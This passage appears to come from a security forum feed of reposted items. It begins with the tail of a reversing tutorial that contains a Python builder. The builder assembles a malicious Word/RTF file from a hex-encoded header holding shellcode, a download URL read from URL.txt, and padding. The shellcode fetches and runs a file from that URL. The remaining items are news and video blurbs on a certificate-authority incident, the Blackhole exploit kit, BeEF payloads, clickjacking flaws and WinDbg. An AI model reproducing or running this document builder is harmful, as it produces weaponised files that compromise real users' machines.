"\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32" "\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74" "\x61\x20\x5C\x64\x62\x63\x68\x20\x2E\x7D\x7D\x7B\x5C\x2A\x5C\x70" "\x6E\x73\x65\x63\x6C\x76\x6C\x32\x5C\x70\x6E\x75\x63\x6C\x74\x72" "\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65" "\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70" "\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x2E\x7D\x7D\x7B" "\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x33\x0D\x0A\x5C\x70" "\x6E\x64\x65\x63\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E" "\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67" "\x20\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20" "\x2E\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x34" "\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C\x70\x6E\x73\x74\x61\x72\x74" "\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E" "\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64" "\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63" "\x6C\x76\x6C\x35\x5C\x70\x6E\x64\x65\x63\x5C\x70\x6E\x73\x74\x61" "\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C" "\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20" "\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61" "\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E" "\x73\x65\x63\x6C\x76\x6C\x36\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C" "\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E" "\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x0D\x0A\x7B\x5C" "\x70\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B" "\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x29\x7D" "\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x37\x5C\x70" "\x6E\x6C\x63\x72\x6D\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70" "\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E" "\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68" "\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63" "\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76" "\x6C\x38\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C\x70\x6E\x73\x74\x61" "\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C" "\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20" "\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61" "\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E" "\x73\x65\x63\x6C\x76\x6C\x39\x5C\x70\x6E\x6C\x63\x72\x6D\x5C\x70" "\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74" "\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x0D\x0A\x7B\x5C\x70" "\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C" "\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D" "\x5C\x70\x61\x72\x64\x5C\x70\x6C\x61\x69\x6E\x20\x5C\x6C\x74\x72" "\x70\x61\x72\x5C\x71\x6A\x20\x5C\x6C\x69\x30\x5C\x72\x69\x30\x5C" "\x6E\x6F\x77\x69\x64\x63\x74\x6C\x70\x61\x72\x5C\x77\x72\x61\x70" "\x64\x65\x66\x61\x75\x6C\x74\x5C\x61\x73\x70\x61\x6C\x70\x68\x61" "\x5C\x61\x73\x70\x6E\x75\x6D\x5C\x66\x61\x61\x75\x74\x6F\x5C\x61" "\x64\x6A\x75\x73\x74\x72\x69\x67\x68\x74\x5C\x72\x69\x6E\x30\x5C" "\x6C\x69\x6E\x30\x5C\x69\x74\x61\x70\x30\x20\x5C\x72\x74\x6C\x63" "\x68\x5C\x66\x63\x73\x31\x20\x5C\x61\x66\x30\x5C\x61\x66\x73\x32" "\x34\x5C\x61\x6C\x61\x6E\x67\x31\x30\x32\x35\x20\x5C\x6C\x74\x72" "\x63\x68\x5C\x66\x63\x73\x30\x20\x0D\x0A\x5C\x66\x73\x32\x31\x5C" "\x6C\x61\x6E\x67\x31\x30\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x32" "\x30\x35\x32\x5C\x6B\x65\x72\x6E\x69\x6E\x67\x32\x5C\x6C\x6F\x63" "\x68\x5C\x61\x66\x30\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64" "\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C" "\x61\x6E\x67\x6E\x70\x31\x30\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65" "\x6E\x70\x32\x30\x35\x32\x20\x7B\x5C\x72\x74\x6C\x63\x68\x5C\x66" "\x63\x73\x31\x20\x5C\x61\x66\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C" "\x66\x63\x73\x30\x20\x5C\x69\x6E\x73\x72\x73\x69\x64\x31\x35\x38" "\x30\x37\x35\x31\x39\x20\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C" "\x64\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x6C\x6F\x63\x68\x5C\x66" "\x30\x20\x46\x7D\x7B\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31" "\x20\x5C\x61\x66\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66\x63\x73" "\x30\x20\x5C\x69\x6E\x73\x72\x73\x69\x64\x31\x35\x38\x30\x37\x35" "\x31\x39\x20\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64\x62\x63" "\x68\x5C\x61\x66\x31\x33\x5C\x6C\x6F\x63\x68\x7D\x7B\x5C\x73\x68" "\x70\x7B\x5C\x73\x70\x7B\x5C\x73\x6E\x31\x09\x70\x66\x52\x61\x47" "\x4D\x65\x4E\x54\x73\x7D\x7B\x5C\x73\x76\x20\x31\x3B\x31\x3B\x30" "\x31\x31\x31\x31\x31\x31\x31\x66\x66\x30\x33\x30\x30\x30\x30\x30" "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" "\x30\x30\x30\x32\x66\x39\x30\x39\x33\x37\x38\x30\x30\x30\x30\x38" "\x30\x37\x63\x30\x30\x30\x30\x38\x30\x37\x63\x42\x42\x42\x42\x42" "\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43\x44\x44\x44\x44\x44" "\x44\x44\x44\x39\x30\x39\x30\x65\x62\x37\x31\x33\x31\x63\x39\x36" "\x34\x38\x62\x37\x31\x33\x30\x38\x62\x37\x36\x30\x63\x38\x62\x37" "\x36\x31\x63\x38\x62\x35\x65\x30\x38\x38\x62\x37\x65\x32\x30\x38" "\x62\x33\x36\x36\x36\x33\x39\x34\x66\x31\x38\x37\x35\x66\x32\x63" "\x33\x36\x30\x38\x62\x36\x63\x32\x34\x32\x34\x38\x62\x34\x35\x33" "\x63\x38\x62\x35\x34\x32\x38\x37\x38\x30\x31\x65\x61\x38\x62\x34" "\x61\x31\x38\x38\x62\x35\x61\x32\x30\x30\x31\x65\x62\x65\x33\x33" "\x34\x34\x39\x38\x62\x33\x34\x38\x62\x30\x31\x65\x65\x33\x31\x66" "\x66\x33\x31\x63\x30\x66\x63\x61\x63\x38\x34\x63\x30\x37\x34\x30" "\x37\x63\x31\x63\x66\x30\x64\x30\x31\x63\x37\x65\x62\x66\x34\x33" "\x62\x37\x63\x32\x34\x32\x38\x37\x35\x65\x31\x38\x62\x35\x61\x32" "\x34\x30\x31\x65\x62\x36\x36\x38\x62\x30\x63\x34\x62\x38\x62\x35" "\x61\x31\x63\x30\x31\x65\x62\x38\x62\x30\x34\x38\x62\x30\x31\x65" "\x38\x38\x39\x34\x34\x32\x34\x31\x63\x36\x31\x63\x33\x65\x38\x39" "\x32\x66\x66\x66\x66\x66\x66\x35\x64\x65\x62\x30\x35\x65\x38\x66" "\x33\x66\x66\x66\x66\x66\x66\x38\x39\x65\x66\x38\x33\x65\x66\x38" "\x39\x38\x39\x65\x65\x38\x33\x65\x65\x39\x35\x38\x31\x65\x64\x34" "\x35\x66\x66\x66\x66\x66\x66\x36\x38\x33\x33\x63\x61\x38\x61\x35" "\x62\x35\x33\x65\x38\x38\x61\x66\x66\x66\x66\x66\x66\x35\x35\x36" "\x61\x36\x34\x66\x66\x64\x30\x35\x37\x38\x39\x63\x37\x30\x31\x65" "\x66\x61\x34\x38\x30\x37\x66\x66\x66\x30\x30\x37\x35\x66\x39\x35" "\x66\x36\x38\x38\x65\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x36" "\x64\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36" "\x66\x36\x65\x35\x31\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35" "\x34\x66\x66\x64\x30\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35" "\x30\x65\x38\x35\x33\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35" "\x31\x35\x31\x35\x35\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38\x39" "\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x33\x66\x66\x66\x66" "\x66\x66\x66\x34\x31\x35\x31\x35\x35\x66\x66\x64\x30\x37\x33\x37" "\x36\x36\x33\x36\x38\x36\x66\x37\x33\x37\x34\x32\x65\x36\x35\x37" "\x38\x36\x35\x30\x30") footer =("\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x7D\x7D\x7D\x7D" ) url="" ul = open("URL.txt",'rb') sr = ul.read() for i in range(0,len(sr)): a = ord(sr[i]) url += "%02x" % a url +="\x30"*2 payload = header + url + footer file = open("Laden.doc",'wb') file.write(header + url + footer) file.close() os.rename("Laden.doc",st) URL.txt contains the actual URL from where one has to download calc. This URL.txt file should be in the same folder where the creator file will be. You can also embed the direct text string of the URL in the creator file. One more point: reversing the exploit sample will vary from exploit to exploit. It’s not that while reversing another sample you will always apply the same process, but in 80% of the cases, it’s what I explain above. Sursa: InfoSec Institute Resources – Reversing a Malicious Word Document

[h=2]Hacker Database[/h]Browse the World's Largest Public Hacker Database Link: http://www.soldierx.com/hdb Haters gonna hate : TinKode, sysgh0st | SOLDIERX.COM

[h=1]TURKTRUST CA Problems[/h] Kurt Baumgartner Kaspersky Lab Expert Posted January 03, 21:04 GMT Microsoft just publicly announced a release to actively "untrust" three certificates issued by Certificate Authority TURKTRUST and its Intermediate CAs, a subsidiary of the Turkish Armed Forces ELELE Foundation Company. According to Microsoft, the company made a couple major mistakes resulting in fraudulent certificate issuance that could be used to MiTM encrypted communications or spoof gmail and a long list of other google properties. A Chrome installation detected a "an unauthorized digital certificate for the "*.google.com" domain" late the night of Dec. 24th 2012, and the Google security team's investigation began there. TURKTRUST's mistakes included issuing two certificates incorrectly. They created digital certificates for *.EGO.GOV.TR and e-islem.kktcmerkezbankasi.org. Both of these certs lacked CRL or OCSP extensions and were incorrectly issued as end-entity certs. These mistakes enabled the *.EGO.GOV.TR authority to be misused and fraudulently issue a certificate for *.google.com. Microsoft is not only issuing fixes for this CA trust problem, but including known CA fixes in the recent past. This list of Google properties are fixed by the release: *.google.com *.android.com *.appengine.google.com *.cloud.google.com *.google-analytics.com *.google.ca *.google.cl *.google.co.in *.google.co.jp *.google.co.uk *.google.com.ar *.google.com.au *.google.com.br *.google.com.co *.google.com.mx *.google.com.tr *.google.com.vn *.google.de *.google.es *.google.fr *.google.hu *.google.it *.google.nl *.google.pl *.google.pt *.googleapis.cn *.googlecommerce.com *.gstatic.com *.urchin.com *.url.google.com *.yo utube-nocookie.com *.youtube.com *.ytimg.com android.com g.co goo.gl google-analytics.com google.com googlecommerce.com urchin.com youtu.be youtube.com The release may cause some confusion. The vendors are handling the incident differently - the three certificates that are being "untrusted" by Microsoft do not include the TURKTRUST Trusted Root CA certificate itself. But the certificates for the two intermediate authorities are effected, as is the fraudulent Google property certificate. Also adding to the confusion is the fact that some systems seem to have TURKTRUST certificates included as a Trusted Root Certificate Authority on their Windows system, but others do not. This inclusion has to do with the ways in which Microsoft updates their root certificate stores on newer systems vs. older Windows OS systems. Microsoft provides a knowledge base article that presents all of the gory details on Microsoft Root Certificate updates. Just follow the link and go to the section "How Windows Updates Root Certificates", where you will find information on both Windows Vista and Windows 7, on Windows XP and its manual update root package, and on Windows Server 2003, Windows Server 2008, Windows Server 2008 R2 OS systems. To sum it up, most users that do not visit web sites in the Middle East, especially Turkey and Cyprus, will not have the TURKTRUST Trusted Root CA certificate installed on their system (although Google did not disclose the location of the detected fraudulent certificate). So, for the most part, this release does not directly effect their system. Also, most helpful here is the automatic updater of revoked certificates released by Microsoft back in June, available for Windows Vista Service Pack 2, Windows Server 2008 Service Pack 2, Windows 7, and Windows Server 2008 R2. Both Mozilla and Google posted information about the problem. Google pushed Chrome’s certificate revocation metadata on December 24th and 25th to block both of the Intermediate Certificate Authority certificates. An ongoing discussion exists over at the mozilla.dev.security.policy group. It appears that Mozilla is the only vendor of the three to altogether suspend trust in the TURKTRUST root CA cert: "We have also suspended inclusion of the “TÜRKTRUST Bilgi Ýletiþim ve Biliþim Güvenliði Hizmetleri A.Þ. © Aralýk 2007” root certificate, pending further review". Please see the long list of links at the right side of the page for more information from the vendors and posts on past CA issues. Sursa: TURKTRUST CA Problems - Securelist

Analytical Summary Of The Blackhole Exploit Kit Description: ANALYTICAL SUMMARY OF THE BLACKHOLE EXPLOIT KIT Almost Everything You Ever Wanted To Know About The BlackHole Exploit Kit There are hundreds, if not thousands, of news articles and blog posts about the BlackHole Exploit Kit. Usually, each story covers only a very narrow part of the subject matter. This talk will summarize the history of the BlackHole Exploit Kit into one easy to follow story. There will be diagrams and flow-charts for explaining code, rather than a giant blob of illegible Javascript, PHP, or x86 Assembly. A. What a browser exploit kit is, and what it isn't It only does exploits Directing victims to the exploits is out of scope Usually done with spam or iframe injections The actual malware installed is out of scope too Where is exploit kit is hosted, is also quite variable B. Timeline Version 1.0.0 - September 2010 i. It's not that different from other exploit kits Version 1.0.1 Version 1.0.2 - November 2010 i. Changelog ii. Leaked in May 2011 Version 1.1.0 - December 2010 i. Changelog Version 1.2.0 - August 2011 i. Changelog Version 1.2.1 - December 2011 Version 1.2.2 i. Cryptome "Virus" Version 1.2.3 - March 2012 Version 1.2.4 - June 2012 i. CVE-2012-1723 ii. CVE-2011-2110 Version 1.2.5 - July 2012 i. CVE-2012-1889 ii. A single IFRAME injection campaign uses a temporal 'Domain Generation Algorithm' August 2012 i. CVE-2012-4681 Version 2.0.0 - September 2012 i. Changelog ii. The official announcement isn't entirely true. C. The "Free Version" Pulled from a system with C99 Shell IonCube "copy protection" How to break IonCube obfuscation Analysis of PHP Source Code D. Open Source Code in use PluginDetect MaxMind GeoIP etc. E. The Exploits CVE-2010-0188 etc. etc. etc. as time allows X. There is almost no change in the expliots themselves from one version of the exploit kit to the next. Y. Currious clues about the possible authorship of some exploits Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Analytical Summary Of The Blackhole Exploit Kit

Beef - Java Payload Exploitation Description: In this video I will show you how to exploit a system using BeEF Browser Exploitation Framework and Java Payload Module. In BeEF Framework there is one module available called Java Payload in local exploits we are going to use that module and exploiting the windows -7 system. So, first you need to hook the browser and use that module victim will get the Java Pop-up if he click on OK you will get the meterpreter shell in some time Note for getting session it will take some time so be patient. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Beef - Java Payload Exploitation

[h=1]Clickjacking Flaws Expose Details of Live, Yahoo!, Google and Amazon Users – Video[/h]January 3rd, 2013, 15:33 GMT · By Eduard Kovacs Security researcher Luca De Fulgentis has identified a number of user interface redressing (clickjacking) vulnerabilities in popular services that could be leveraged by cybercriminals to gather user information in what’s known as identification attacks. He has also identified a clickjacking flaw in Google Chrome. The fact that many websites don’t use the X-Frame-Options header or other anti-clickjacking mechanisms allows an attacker to harvest all sorts of information if he can trick the victim into clicking on apparently innocent links or buttons. The expert has demonstrated that such an issue in support.google.com can be used to extract a user’s email address, full name and profile picture URL. The names, email addresses and other details of Microsoft Live and Yahoo! users could also be easily obtained by leveraging clickjacking vulnerabilities. However, the most interesting finding of De Fulgentis is a Chrome vulnerability that allows attackers to extract user information despite the many security mechanisms implemented by Google, such as denying the use of the view-source handler and disallowing cross-origin drag and drop. “Instead of a cross-origin drag&drop, the victim is tricked to perform a same-origin action, where the dragged content belongs to a vulnerable web page of the targeted application and the ‘dropper’ is a form (text area, input text field, etc.) located on the same domain,” the researcher explained. “Using a site's functionality that allows publishing externally-facing content, it is still possible to extract information. Under these circumstances, Chrome will not reasonably deny the same-origin drag&drop, thus inducing the victim to involuntary publish sensitive data.” To demonstrate how such attacks work, the expert has published a couple of proof-of-concept videos showing how the vulnerability could be leveraged against Google and Amazon users. Earlier in December, De Fulgentis published the details of a similar vulnerability that affected Firefox. Here are the proof-of-concept videos published by the expert: Sursa: Clickjacking Flaws Expose Details of Live, Yahoo!, Google and Amazon Users – Video - Softpedia

Stiam ca e un macro, dar nu stiam cum e definit si dupa mici cautari: WinBase.h #define ZeroMemory RtlZeroMemory RtlZeroMemory e definit in WDH.h: #define RtlZeroMemory(Destination,Length) memset((Destination),0,(Length)) Aparent e acelasi lucru. E probabil insa sa fie mici diferente la apel, "memset" probabil va apela wrapper-ul din runtime-ul de la Visual C iar apelul ZeroMemory e posibil sa fie executat direct in kernel (RtlZeroMemory routine (Windows Drivers)). O sa fac putin research sa vad.

[h=1]Defrag Tools: #21 - WinDbg - Memory User Mode[/h]By: Larry Larsen, Andrew Richards, Chad Beeder 33 minutes, 48 seconds [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 31.0 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 185.9 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 109.7 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 408.7 MB Mid Quality MP4 (WP7, HTML5) [h=3]File size[/h] 285.1 MB High Quality WMV (PC, Xbox, MCE) [h=3]File size[/h] 507.7 MB format < > embed + queue In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to show the memory used in a user mode debug session. We cover these commands: !address -summary !address <addr> !vprot <addr> !mapped_file <addr> Make sure you watch Defrag Tools Episode #1 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbols and source code resolution. Resources: Microsoft Windows SDK for Windows 7 and .NET Framework 4 Sysinternals VMMap Performance and Memory Consumption Under WOW64 MEMORY_BASIC_INFORMATION structure Memory Protection Constants Timeline: [00:50] - Live Debug of Notepad [01:10] - VMMap of Notepad [02:08] - Virtual Address Space summary (!address -summary) [04:30] - 'Large Address Space Aware' increases the VA space from 2GB to 4GB [08:11] - Memory Mapped Files [10:11] - Memory Type, State and Protection (inc. Guard Pages) [21:22] - Allocation Base vs. Base Address (!address <addr>) [26:52] - Virtual Protection shows the Alloc. Base 